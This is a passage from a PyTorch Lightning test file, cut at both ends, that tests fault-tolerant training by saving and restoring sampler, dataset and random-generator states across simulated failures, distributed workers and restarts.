2:\n id = worker_info.id\n num_samples = len(self.data)\n if id == 0:\n self.data = list(self.data)[: num_samples // 2]\n else:\n self.data = list(self.data)[num_samples // 2 :]\n self.user_sampler = RandomSampler(self.data)\n else:\n self.user_sampler = RandomSampler(self.data)\n\n setattr(self, self.attr_name, iter(self.user_sampler))\n return self\n\n def __next__(self):\n iter_sampler = getattr(self, self.attr_name)\n return self.data[next(iter_sampler)]\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 30 sec and should be skipped in Azure CI\")\n@pytest.mark.parametrize(\"num_workers\", [0, 1, 2])\ndef test_fast_forward_sampler_over_iterable_dataset(num_workers):\n \"\"\"This test ensures ``FastForwardSampler`` and ``CaptureIterableDataset`` are properly being used to capture\n workers states.\"\"\"\n batch_size = 3\n initial_seed = seed_everything(42)\n generator = torch.Generator()\n generator.manual_seed(initial_seed)\n dataset = RangeIterableDataset(range(20), num_workers, batch_size, True)\n dataset = CaptureIterableDataset(dataset)\n\n dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n iter_dataloader = iter(dataloader)\n batches = []\n for _ in range(5):\n batches.append(next(iter_dataloader))\n\n # restarting on batch_1 and getting 3 extra batches\n\n state_dict = {\"iter_sampler\": {}}\n for batch in batches[:2]:\n batch, _state_dict = batch[\"data\"], batch[AutoRestartBatchKeys.PL_RESTART_META]\n for k, v in _state_dict.items():\n state_dict[k].update(v)\n\n assert len(state_dict[\"iter_sampler\"]) == (num_workers if num_workers > 1 else 1)\n\n initial_seed = seed_everything(42)\n 
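The fast-forward contract these tests exercise boils down to a short save/restore round-trip; the sketch below condenses the sequential-sampler test above for reference (same imports as this file):

```python
from torch.utils.data import BatchSampler, SequentialSampler

sampler = FastForwardSampler(SequentialSampler(range(15)))
sampler.setup(3)  # batch size
batches = iter(BatchSampler(sampler, 3, False))
assert next(batches) == [0, 1, 2]
assert next(batches) == [3, 4, 5]
state = sampler.state_dict(2)  # state after two fetched batches

restored = FastForwardSampler(SequentialSampler(range(15)))
restored.setup(3)
restored.load_state_dict(state)
assert next(iter(BatchSampler(restored, 3, False))) == [6, 7, 8]  # resumes mid-epoch
```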
generator.manual_seed(initial_seed)\n dataset = RangeIterableDataset(range(20), num_workers, batch_size, state_dict=state_dict)\n dataset = CaptureIterableDataset(dataset)\n dataset.load_state_dict(state_dict)\n dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n iter_dataloader = iter(dataloader)\n batches_restart = []\n for _ in range(3):\n batches_restart.append(next(iter_dataloader))\n\n assert torch.equal(batches_restart[0][\"data\"], batches[2][\"data\"])\n assert torch.equal(batches_restart[1][\"data\"], batches[3][\"data\"])\n assert torch.equal(batches_restart[2][\"data\"], batches[4][\"data\"])\n\n\ndef _setup_ddp(rank, worldsize):\n os.environ[\"MASTER_ADDR\"] = \"localhost\"\n\n # initialize the process group\n dist.init_process_group(\"gloo\", rank=rank, world_size=worldsize)\n\n\ndef _test_fast_forward_sampler_with_distributed_sampler(rank, worldsize):\n _setup_ddp(rank, worldsize)\n\n initial_seed = seed_everything(42)\n\n generator = torch.Generator()\n generator.manual_seed(initial_seed)\n\n num_workers = 2\n batch_size = 4\n\n dataset = range(30)\n sampler = FastForwardSampler(DistributedSampler(dataset, num_replicas=worldsize, rank=rank, seed=initial_seed))\n sampler.setup(batch_size)\n dataloader = DataLoader(\n dataset, batch_size=batch_size, num_workers=num_workers, generator=generator, sampler=sampler\n )\n\n iter_dataloader = iter(dataloader)\n\n num_yielded = 0\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n num_yielded += 1\n except StopIteration:\n break\n\n expected = torch.tensor([17, 27, 24]) if rank == 0 else torch.tensor([19, 5, 3])\n assert torch.equal(batches[-1], expected)\n\n assert sampler.state_dict(num_yielded)[0][\"current_iteration\"] == 16\n\n reload_state_dict = sampler.state_dict(num_yielded - 1)\n assert reload_state_dict[0][\"current_iteration\"] == 12\n\n sampler = FastForwardSampler(DistributedSampler(dataset, num_replicas=worldsize, rank=rank, seed=initial_seed))\n sampler.setup(batch_size)\n sampler.load_state_dict(reload_state_dict)\n dataloader = DataLoader(\n dataset, batch_size=batch_size, num_workers=num_workers, generator=generator, sampler=sampler\n )\n\n iter_dataloader = iter(dataloader)\n\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n except StopIteration:\n break\n\n assert torch.equal(batches[-1], expected)\n assert sampler.state_dict(num_yielded)[0][\"current_iteration\"] == 16\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 25 sec and should be skipped in Azure CI\")\n@RunIf(skip_windows=True)\ndef test_fast_forward_sampler_with_distributed_sampler():\n \"\"\"Make sure result logging works with DDP.\"\"\"\n tutils.set_random_main_port()\n worldsize = 2\n mp.spawn(_test_fast_forward_sampler_with_distributed_sampler, args=(worldsize,), nprocs=worldsize)\n\n\nclass MetaLearningDataset(IterableDataset):\n def __init__(\n self,\n dataset: Dataset,\n batch_size: int,\n drop_last: bool,\n task_num_classes: int = 5,\n num_workers: Optional[int] = None,\n global_rank: Optional[int] = None,\n world_size: Optional[int] = None,\n initial_seed: Optional[int] = None,\n shuffle: bool = True,\n debugging: bool = False,\n ):\n self.dataset = dataset\n self.batch_size = batch_size\n self.drop_last = drop_last\n self.num_workers = num_workers or 1\n self.global_rank = global_rank\n self.world_size = world_size\n self.task_num_classes = task_num_classes\n 
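As a quick sanity sketch for the `_generate_state` helper defined near the top of this file: the derivation is deterministic, and for these concrete inputs the per-worker states diverge (an illustration, not a general proof):

```python
s_a = _generate_state(42, worker_id=0)
s_b = _generate_state(42, worker_id=0)
s_c = _generate_state(42, worker_id=1)
assert len(s_a) == 4 and all(0 <= w <= 0xFFFFFFFF for w in s_a)
assert s_a == s_b   # same inputs -> same four 32-bit seed words
assert s_a != s_c   # a different worker id diverges for these inputs
```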
self.labels = labels = getattr(dataset, \"labels\")\n self.initial_seed = initial_seed\n self.generator: Optional[torch.Generator] = None\n self.current_task_iteration = 0\n self.shuffle = shuffle\n self.debugging = debugging\n\n if labels is None:\n raise MisconfigurationException(f\"Provided {self.dataset} should have an attribute labels.\")\n\n if len(labels) != len(dataset):\n raise MisconfigurationException(\"Found provided ``labels`` don't match the dataset length.\")\n\n if (isinstance(global_rank, int) and world_size is None) or (\n isinstance(world_size, int) and global_rank is None\n ):\n raise MisconfigurationException(\"Both ``world_size`` and ``global_rank`` should be provided !\")\n\n self.unique_labels = np.unique(self.labels)\n\n @property\n def worker_id(self) -> int:\n worker_info = get_worker_info()\n return worker_info.id if worker_info else 0\n\n @property\n def is_distributed(self) -> bool:\n return self.world_size is not None and self.world_size > 1\n\n def set_seed(self, shared: bool = False):\n initial_seed = self.initial_seed + self.current_task_iteration\n if shared:\n seed = initial_seed\n np_seed = _generate_state(initial_seed, 0)\n else:\n seed = initial_seed + self.worker_id + self.global_rank + self.current_task_iteration\n np_seed = _generate_state(initial_seed, self.worker_id + self.global_rank)\n\n random.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(np_seed)\n\n def sample_task_indices(self):\n self.set_seed(shared=True)\n self.selected_indexes = np.random.choice(self.unique_labels, self.task_num_classes, replace=False)\n self.selected_indexes.sort()\n\n # subset of indices from the entire dataset where the labels are actually among the\n # task_num_classes selected_indexes\n\n self.task_indices = np.arange(len(self.dataset))[np.in1d(self.labels, self.selected_indexes)]\n self.task_length = len(self.task_indices)\n self.set_seed(shared=False)\n\n @property\n def worker_rank(self) -> int:\n worker_id = self.worker_id\n is_global_zero = self.global_rank == 0\n return self.global_rank + worker_id + int(not is_global_zero)\n\n def create_sampler(self):\n data = range(self.task_length)\n if self.world_size == 1 and self.num_workers in (0, 1):\n if self.shuffle:\n self.sampler = RandomSampler(data, generator=self.generator)\n else:\n self.sampler = SequentialSampler(data)\n else:\n num_workers = 1 if self.num_workers in (None, 0) else self.num_workers\n num_replicas = num_workers * self.world_size\n current_seed = self.initial_seed + self.current_task_iteration\n self.sampler = DistributedSampler(\n data, num_replicas=num_replicas, rank=self.worker_rank, shuffle=self.shuffle, seed=current_seed\n )\n\n def __iter__(self):\n if self.generator is None:\n self.generator = torch.Generator().manual_seed(self.initial_seed)\n self.sample_task_indices()\n self.create_sampler()\n self.batch_sampler = BatchSampler(self.sampler, batch_size=self.batch_size, drop_last=self.drop_last)\n self.iter_sampler = iter(self.batch_sampler)\n self.is_first_batch = True\n self.current_task_iteration += 1\n return self\n\n def increment_iteration(self):\n self.current_task_iteration += 1\n\n def __next__(self):\n # this is optional, but useful to accumulate gradient over the entire task.\n is_first_batch = self.is_first_batch if self.debugging else (self.is_first_batch and self.worker_id == 0)\n if is_first_batch:\n self.is_first_batch = False\n return {\"task_length\": len(self.batch_sampler), \"selected_indexes\": self.selected_indexes}\n\n random_indices = 
next(self.iter_sampler)\n task_indices = [self.task_indices[idx] for idx in random_indices]\n return default_collate([self.dataset[idx] for idx in task_indices])\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self, inputs, labels):\n self.inputs = inputs\n self.labels = labels\n assert len(self.inputs) == len(self.labels)\n\n def __getitem__(self, index):\n return (self.inputs[index], self.labels[index])\n\n def __len__(self):\n return len(self.inputs)\n\n\ndef _test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset(rank, worldsize):\n if worldsize > 1:\n _setup_ddp(rank, worldsize)\n\n def all_gather(tensor, world_size):\n tensor_list = [torch.zeros_like(tensor, dtype=torch.int64) for _ in range(world_size)]\n torch.distributed.all_gather(tensor_list, tensor)\n return tensor_list\n\n initial_seed = seed_everything(42)\n\n generator = torch.Generator()\n generator.manual_seed(initial_seed)\n\n num_workers = 2\n batch_size = 4\n dataset_length = 60\n num_classes = 10\n\n labels = np.random.randint(0, num_classes, dataset_length)\n\n dataset = ClassificationDataset(range(dataset_length), labels)\n dataset = MetaLearningDataset(\n dataset,\n batch_size=batch_size,\n drop_last=True,\n num_workers=num_workers,\n global_rank=rank,\n world_size=worldsize,\n initial_seed=initial_seed,\n debugging=True,\n shuffle=True,\n )\n dataset = CaptureIterableDataset(dataset)\n dataloader = DataLoader(dataset, num_workers=num_workers, batch_size=1, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n epoch_results = []\n for _ in range(2):\n iter_dataloader = iter(dataloader)\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n except StopIteration:\n break\n epoch_results.append(batches)\n dataloader.dataset.dataset.current_task_iteration += 1\n\n assert len(epoch_results) == 2\n\n assert len(epoch_results[0]) == math.ceil((dataset_length / (num_workers * worldsize)) / batch_size) + 2\n\n if worldsize == 1:\n assert epoch_results[0][0][\"data\"][\"task_length\"] == epoch_results[0][1][\"data\"][\"task_length\"]\n assert torch.equal(\n epoch_results[0][0][\"data\"][\"selected_indexes\"], epoch_results[0][1][\"data\"][\"selected_indexes\"]\n )\n assert 0 in epoch_results[0][2][AutoRestartBatchKeys.PL_RESTART_META][\"iter_sampler\"] # worker id 0\n assert 1 in epoch_results[0][3][AutoRestartBatchKeys.PL_RESTART_META][\"iter_sampler\"] # worker id 1\n assert not torch.equal(epoch_results[0][2][\"data\"][0], epoch_results[0][3][\"data\"][0])\n else:\n first_task_metadata = all_gather(epoch_results[0][0][\"data\"][\"task_length\"], worldsize)\n second_task_metadata = all_gather(epoch_results[0][1][\"data\"][\"task_length\"], worldsize)\n assert torch.equal(first_task_metadata[0], first_task_metadata[1])\n assert torch.equal(second_task_metadata[0], second_task_metadata[1])\n assert torch.equal(first_task_metadata[0], second_task_metadata[1])\n\n first_batch_list = all_gather(epoch_results[0][2][\"data\"][0], worldsize)\n assert not torch.equal(first_batch_list[0], first_batch_list[1])\n second_batch_list = all_gather(epoch_results[0][3][\"data\"][0], worldsize)\n assert not torch.equal(second_batch_list[0], second_batch_list[1])\n\n # restarting on epoch 0 / real batch 2\n state_dict = {\"iter_sampler\": {}}\n for batch in epoch_results[0][2:4]:\n batch, _state_dict = batch[\"data\"], batch[AutoRestartBatchKeys.PL_RESTART_META]\n for k, v in _state_dict.items():\n state_dict[k].update(v)\n\n dataset = 
ClassificationDataset(range(dataset_length), labels)\n dataset = MetaLearningDataset(\n dataset,\n batch_size=batch_size,\n drop_last=True,\n num_workers=num_workers,\n global_rank=rank,\n world_size=worldsize,\n initial_seed=initial_seed,\n debugging=True,\n shuffle=True,\n )\n\n dataset = CaptureIterableDataset(dataset)\n dataset.load_state_dict(state_dict)\n dataloader = DataLoader(dataset, num_workers=num_workers, batch_size=1, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n epoch_results_restart = []\n for _ in range(2):\n iter_dataloader = iter(dataloader)\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n except StopIteration:\n break\n epoch_results_restart.append(batches)\n dataloader.dataset.dataset.increment_iteration()\n dataloader.dataset.reset_on_epoch()\n\n assert len(epoch_results_restart[0]) + 2 == len(epoch_results[0])\n epoch_tensors = [e[\"data\"][0] for e in epoch_results[0][4:]]\n epoch_tensors_restart = [e[\"data\"][0] for e in epoch_results_restart[0][2:]]\n\n for t, tr in zip(epoch_tensors, epoch_tensors_restart):\n assert torch.equal(t, tr)\n\n epoch_tensors = [e[\"data\"][0] for e in epoch_results[1][2:]]\n epoch_tensors_restart = [e[\"data\"][0] for e in epoch_results_restart[1][2:]]\n\n for t, tr in zip(epoch_tensors, epoch_tensors_restart):\n assert torch.equal(t, tr)\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 45 sec and should be skipped in Azure CI\")\ndef test_fast_forward_sampler_iterative_dataset():\n _test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset(0, 1)\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 55 sec and should be skipped in Azure CI\")\n@RunIf(skip_windows=True)\ndef test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset():\n \"\"\"Make sure result logging works with DDP.\"\"\"\n tutils.set_random_main_port()\n worldsize = 2\n mp.spawn(\n _test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset, args=(worldsize,), nprocs=worldsize\n )\n\n\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(max_torch=\"1.7\")\ndef test_fault_tolerant_not_supported():\n assert not _fault_tolerant_training()\n\n\ndef create_iterable_dataset(batch_size, num_workers, attr_name=\"iter_sampler\", wrap: bool = True):\n dataset = RangeIterableDataset(range(50), num_workers=num_workers, batch_size=batch_size, attr_name=attr_name)\n if wrap:\n dataset = CaptureIterableDataset(dataset)\n return dataset\n\n\ndef test_dataloader_to_state_dict_and_reload():\n \"\"\"\n Note: Those utilities are used only with DataLoader wrapping a ``mapping`` based dataset.\n \"\"\"\n\n def create_dataloader():\n dataset = range(50)\n batch_size = 8\n sampler = FastForwardSampler(SequentialSampler(dataset))\n sampler.setup(batch_size)\n\n return DataLoader(dataset, sampler=sampler, batch_size=batch_size)\n\n dataloader = create_dataloader()\n iter_dataloader = iter(dataloader)\n _ = next(iter_dataloader)\n _ = next(iter_dataloader)\n\n state_dict = _dataloader_to_state_dict(dataloader, iter_dataloader)\n assert state_dict == {\n \"num_workers\": 0,\n \"previous_worker\": None,\n 0: {\"current_iteration\": 16},\n }\n\n dataloader = create_dataloader()\n dataloader = _dataloader_load_state_dict(dataloader, state_dict)\n iter_dataloader = iter(dataloader)\n _ = next(iter_dataloader)\n\n state_dict = _dataloader_to_state_dict(dataloader, iter_dataloader)\n assert state_dict == {\n 
\"num_workers\": 0,\n \"previous_worker\": None,\n 0: {\"current_iteration\": 24},\n }\n\n\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\"use_fault_tolerant\", [\"0\", \"1\"])\ndef test_data_loading_wraps_dataset_and_samplers(use_fault_tolerant, tmpdir):\n \"\"\"This test ensures the dataset and sampler are properly wrapped when fault tolerant is enabled.\"\"\"\n\n class CustomBatchSampler(BatchSampler):\n pass\n\n dataset = range(50)\n\n class TestModel(BoringModel):\n def train_dataloader(self):\n return {\n \"a\": [\n DataLoader(create_iterable_dataset(3, 1, wrap=False), num_workers=0, batch_size=3),\n DataLoader(dataset, batch_size=8),\n DataLoader(\n dataset,\n batch_sampler=CustomBatchSampler(SequentialSampler(dataset), batch_size=8, drop_last=False),\n ),\n ],\n \"b\": DataLoader(\n create_iterable_dataset(2, num_workers=1, attr_name=\"custom_sampler\", wrap=False),\n num_workers=0,\n batch_size=2,\n ),\n }\n\n def training_step(self, batch, batch_idx):\n assert batch == {\n \"a\": [ANY, ANY, ANY],\n \"b\": ANY,\n }\n\n def validation_step(self, batch, batch_idx):\n assert isinstance(batch, torch.Tensor)\n\n validation_epoch_end = None\n\n class Check(Callback):\n def on_train_batch_start(self, trainer, *_) -> None:\n loaders = trainer.train_dataloader.loaders\n if use_fault_tolerant == \"1\":\n assert isinstance(loaders[\"a\"][0].loader.dataset, CaptureIterableDataset)\n assert isinstance(loaders[\"a\"][1].loader.sampler, FastForwardSampler)\n assert isinstance(loaders[\"a\"][1].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"a\"][2].loader.batch_sampler, FastForwardSampler)\n assert isinstance(loaders[\"a\"][2].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"b\"].loader.dataset, CaptureIterableDataset)\n else:\n assert isinstance(loaders[\"a\"][0].loader.dataset, RangeIterableDataset)\n assert isinstance(loaders[\"a\"][1].loader.sampler, SequentialSampler)\n assert not isinstance(loaders[\"a\"][1].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"a\"][2].loader.batch_sampler, CustomBatchSampler)\n assert not isinstance(loaders[\"a\"][2].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"b\"].loader.dataset, RangeIterableDataset)\n\n with mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": use_fault_tolerant}):\n model = TestModel()\n model.training_epoch_end = None\n trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, limit_train_batches=1, callbacks=Check())\n trainer.fit(model)\n\n\nclass SequentialGetItemDataset(Dataset):\n def __init__(self, length, *_):\n self.len = length\n\n def __getitem__(self, index):\n return torch.tensor([index]).float()\n\n def __len__(self):\n return self.len\n\n\nclass RandomGetItemDataset(Dataset):\n \"\"\"A dataset with random elements generated using global rng from torch, numpy and python.\"\"\"\n\n def __init__(self, length, size):\n self.size = size\n self.len = length\n\n def __getitem__(self, index):\n t = torch.rand(self.size)\n n = torch.from_numpy(np.random.rand(self.size))\n p = torch.tensor([python_random.random() for _ in range(self.size)])\n sample = (index + (t + n + p) / 10).float()\n return sample\n\n def __len__(self):\n return self.len\n\n\n# TODO: test with `RandomGeneratorGetItemDataset`\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\n \"dataset_class\",\n [\n SequentialGetItemDataset,\n RandomGetItemDataset,\n # RandomGeneratorGetItemDataset,\n 
],\n)\n@pytest.mark.parametrize(\"num_workers\", [0])\n@pytest.mark.parametrize(\"batch_size\", [1, 2, 3])\ndef test_dataset_rng_states_restart(dataset_class, num_workers, batch_size):\n \"\"\"Test that the sequence of batches coming from a random number generator continues with the correct sequence\n after reloading the state.\"\"\"\n\n def create_dataset_sampler():\n dset = CaptureMapDataset(dataset_class(16, 8))\n random_sampler = RandomSampler(dset, generator=torch.Generator())\n return dset, random_sampler\n\n def create_dataloader_sampler(dset, sampler):\n sampler = FastForwardSampler(sampler)\n sampler.setup(batch_size)\n dl = DataLoader(dset, num_workers=num_workers, sampler=sampler, batch_size=batch_size)\n _add_capture_metadata_collate(dl)\n return dl, sampler\n\n def fetch(fetcher, prefetch_iter, num_batches_fetched):\n batch, _ = next(prefetch_iter)\n\n state: List[MergedIteratorState] = fetcher.state\n assert len(state) == 1\n assert isinstance(state[0], MergedIteratorState)\n\n assert len(fetcher.dataloader_iter.cache_states) == 1\n if num_workers == 0:\n assert state[0].state[0].num_batches_fetched == num_batches_fetched\n return state\n\n dataset, random_sampler = create_dataset_sampler()\n dataloader, ff_sampler = create_dataloader_sampler(dataset, random_sampler)\n\n fetcher = DataFetcher()\n fetcher.setup(dataloader)\n prefetch_iter = iter(fetcher)\n\n # fetch 4 batches\n fetch(fetcher, prefetch_iter, 1)\n fetch(fetcher, prefetch_iter, 2)\n fetch(fetcher, prefetch_iter, 3)\n\n # (A) capture the state after fetching 4 batches\n state = fetch(fetcher, prefetch_iter, 4)\n state = deepcopy(state[0])\n\n # (B) simulate 2 additional batches\n batch05, _ = next(prefetch_iter)\n batch06, _ = next(prefetch_iter)\n\n # start reloading\n dataset, random_sampler = create_dataset_sampler()\n dataloader, ff_sampler = create_dataloader_sampler(dataset, random_sampler)\n\n # load the state dict saved at (A)\n ff_sampler.load_state_dict(state.sampler_states)\n dataset.load_state_dict(state.dataset_states, latest_worker_id=state.latest_worker_id, num_workers=num_workers)\n\n prefetcher = DataFetcher()\n prefetcher.setup(dataloader)\n prefetch_iter = iter(prefetcher)\n\n # fetch 2 random batches, these should match exactly the batches seen at (B)\n batch05_restart, _ = next(prefetch_iter)\n batch06_restart, _ = next(prefetch_iter)\n\n assert torch.equal(batch05, batch05_restart)\n assert torch.equal(batch06, batch06_restart)\n\n\nclass CustomException(Exception):\n pass\n\n\nclass SequentialIterableDataset(IterableDataset):\n def __init__(self, length, *_):\n self.len = length\n self.sampler = SequentialSampler(range(self.len))\n\n def __iter__(self):\n self.sampler_iter = iter(self.sampler)\n return self\n\n def __next__(self):\n indices = next(self.sampler_iter)\n return torch.tensor([indices]).float()\n\n\nclass SequentialDictIterableDataset(SequentialIterableDataset):\n def __next__(self):\n indices = next(self.sampler_iter)\n return {\"data\": torch.tensor([indices]).float()}\n\n\nclass TestModel(LightningModule):\n def __init__(self, fail_on_step: int = -1):\n super().__init__()\n self.layer = torch.nn.Linear(1, 2)\n self.seen_batches = []\n self.fail_on_step = fail_on_step\n\n def training_step(self, batch, batch_idx):\n if self.global_step == self.fail_on_step:\n raise CustomException()\n batch = batch[\"data\"] if isinstance(batch, dict) else batch\n self.seen_batches.append(torch.stack(batch) if isinstance(batch, list) else batch)\n loss = sum(self.layer(b).sum() for b in 
batch)\n return loss\n\n def configure_optimizers(self):\n return torch.optim.SGD(self.layer.parameters(), lr=0.1)\n\n\ndef _run_training(trainer_kwargs, dataset_classes, fail_on_step: int = -1, ckpt_path=None):\n seed_everything(1)\n train_dataloader = [\n DataLoader(dataset_class(3, 1), batch_size=1, num_workers=0) for dataset_class in dataset_classes\n ]\n train_dataloader = train_dataloader[0] if len(train_dataloader) == 1 else train_dataloader\n model = TestModel(fail_on_step=fail_on_step)\n trainer = Trainer(**trainer_kwargs)\n with suppress(CustomException):\n trainer.fit(model, train_dataloader=train_dataloader, ckpt_path=ckpt_path)\n return model.seen_batches, model.parameters()\n\n\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\n \"dataset_classes\",\n [\n # single training dataset\n [RandomGetItemDataset],\n [SequentialIterableDataset],\n [SequentialDictIterableDataset],\n # multiple training datasets (combined dataloader)\n [SequentialGetItemDataset, SequentialIterableDataset],\n [SequentialIterableDataset, SequentialIterableDataset],\n # [RandomGetItemDataset, RandomGetItemDataset], # TODO: support in the future\n ],\n)\n@pytest.mark.parametrize(\"multiple_trainloader_mode\", [\"min_size\", \"max_size_cycle\"])\ndef test_dataset_rng_states_restart_with_lightning(tmpdir, dataset_classes, multiple_trainloader_mode):\n \"\"\"Test that the Trainer can resume from a failed run in the case of several types of datasets.\"\"\"\n trainer_kwargs = dict(\n default_root_dir=tmpdir,\n max_epochs=3,\n enable_progress_bar=False,\n enable_model_summary=False,\n multiple_trainloader_mode=multiple_trainloader_mode,\n )\n\n all_batches, weights0 = _run_training(trainer_kwargs, dataset_classes)\n all_batches = torch.stack(all_batches)\n assert len(all_batches) == 9\n\n # Simulate 1st failure\n complete_batches, _ = _run_training(trainer_kwargs, dataset_classes, fail_on_step=4)\n assert len(complete_batches) == 4\n\n checkpoint_path = os.path.join(tmpdir, \".pl_auto_save.ckpt\")\n assert os.path.exists(checkpoint_path)\n\n # Resume after failure\n resumed_batches, weights1 = _run_training(\n trainer_kwargs, dataset_classes, fail_on_step=-1, ckpt_path=checkpoint_path\n )\n assert len(resumed_batches) == 5\n\n # the resumed batches should match the batches of the successful training\n all_batches_resumed = torch.stack(complete_batches + resumed_batches)\n assert len(all_batches_resumed) == 9\n assert torch.equal(all_batches, all_batches_resumed)\n\n # the final weights of a resumed training should equal the weights of an uninterrupted training\n for w0, w1 in zip(weights0, weights1):\n assert w0 is not w1\n assert torch.allclose(w0, w1)\n\n\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\n [\"train_datasets\", \"val_datasets\"],\n [\n ([RandomGetItemDataset], [RandomGetItemDataset]),\n ([RandomGetItemDataset], [RandomGetItemDataset, RandomGetItemDataset]),\n ],\n)\n@pytest.mark.parametrize(\n \"val_check_interval\",\n [\n pytest.param(\n 0.5,\n marks=pytest.mark.xfail(\n reason=(\n \"TODO: the `train_dataloader` random state overrides the validation state when restarting training\"\n )\n ),\n ),\n 1.0,\n ],\n)\ndef test_auto_restart_within_validation_loop(train_datasets, val_datasets, val_check_interval, tmpdir):\n n_val_dataloaders = len(val_datasets)\n stop_dataloader = n_val_dataloaders - 1\n stop_batch = 1\n\n class 
ValidationLoopTestModel(LightningModule):\n def __init__(self, should_fail):\n super().__init__()\n self.layer = torch.nn.Linear(1, 2)\n self.should_fail = should_fail\n self.training_batches = []\n self.validation_batches = defaultdict(list)\n\n def step(self, batch):\n return sum(self.layer(b).sum() for b in batch)\n\n def training_step(self, batch, batch_idx):\n self.training_batches.append(batch)\n return self.step(batch)\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n if self.should_fail and stop_dataloader == dataloader_idx and batch_idx == stop_batch:\n raise CustomException\n self.validation_batches[dataloader_idx].append(batch)\n return self.step(batch)\n\n def configure_optimizers(self):\n return torch.optim.SGD(self.layer.parameters(), lr=0.1)\n\n def train_dataloader(self):\n return [DataLoader(cls(4, 1)) for cls in train_datasets]\n\n def val_dataloader(self):\n return [DataLoader(cls(4, 1)) for cls in val_datasets]\n\n def run(should_fail, resume):\n if not resume:\n seed_everything(42)\n\n model = ValidationLoopTestModel(should_fail)\n\n ckpt_path = str(tmpdir / \".pl_auto_save.ckpt\") if resume else None\n trainer = Trainer(\n default_root_dir=tmpdir,\n max_epochs=1,\n val_check_interval=val_check_interval,\n num_sanity_val_steps=0,\n )\n if should_fail:\n with pytest.raises(CustomException):\n trainer.fit(model, ckpt_path=ckpt_path)\n else:\n trainer.fit(model, ckpt_path=ckpt_path)\n\n return model.training_batches, model.validation_batches\n\n total_train_batches, total_val_batches = run(should_fail=False, resume=False)\n pre_fail_train_batches, pre_fail_val_batches = run(should_fail=True, resume=False)\n post_fail_train_batches, post_fail_val_batches = run(should_fail=False, resume=True)\n\n torch.testing.assert_allclose(total_train_batches, pre_fail_train_batches + post_fail_train_batches)\n for k in total_val_batches:\n torch.testing.assert_allclose(total_val_batches[k], pre_fail_val_batches[k] + post_fail_val_batches[k])\n\n\nclass TestAutoRestartModelUnderSignal(BoringModel):\n def __init__(self, should_signal: bool, failure_on_step: bool, failure_on_training: bool, on_last_batch: bool):\n super().__init__()\n self.should_signal = should_signal\n self.failure_on_step = failure_on_step\n self.failure_on_training = failure_on_training\n self.on_last_batch = on_last_batch\n self.seen_train_batches = []\n\n def _signal(self):\n if self.should_signal:\n # simulate `os.kill(os.getpid(), signal.SIGUSR1)`\n self.trainer._terminate_gracefully = True\n\n def training_step(self, batch, batch_idx):\n self.seen_train_batches.append(batch)\n should_signal = self.trainer.fit_loop.epoch_loop._is_training_done if self.on_last_batch else batch_idx == 2\n if self.failure_on_step and self.failure_on_training and should_signal:\n self._signal()\n return super().training_step(batch, batch_idx)\n\n def validation_step(self, batch, batch_idx):\n should_signal = (\n self.trainer.fit_loop.epoch_loop.val_loop.epoch_loop.batch_progress.is_last_batch\n if self.on_last_batch\n else batch_idx == 2\n )\n if self.failure_on_step and not self.failure_on_training and should_signal:\n self._signal()\n return super().validation_step(batch, batch_idx)\n\n def training_epoch_end(self, outputs) -> None:\n if not self.failure_on_step and self.failure_on_training:\n self._signal()\n\n def validation_epoch_end(self, outputs) -> None:\n if not self.failure_on_step and not self.failure_on_training:\n self._signal()\n\n def train_dataloader(self):\n return DataLoader(RandomDataset(32, 
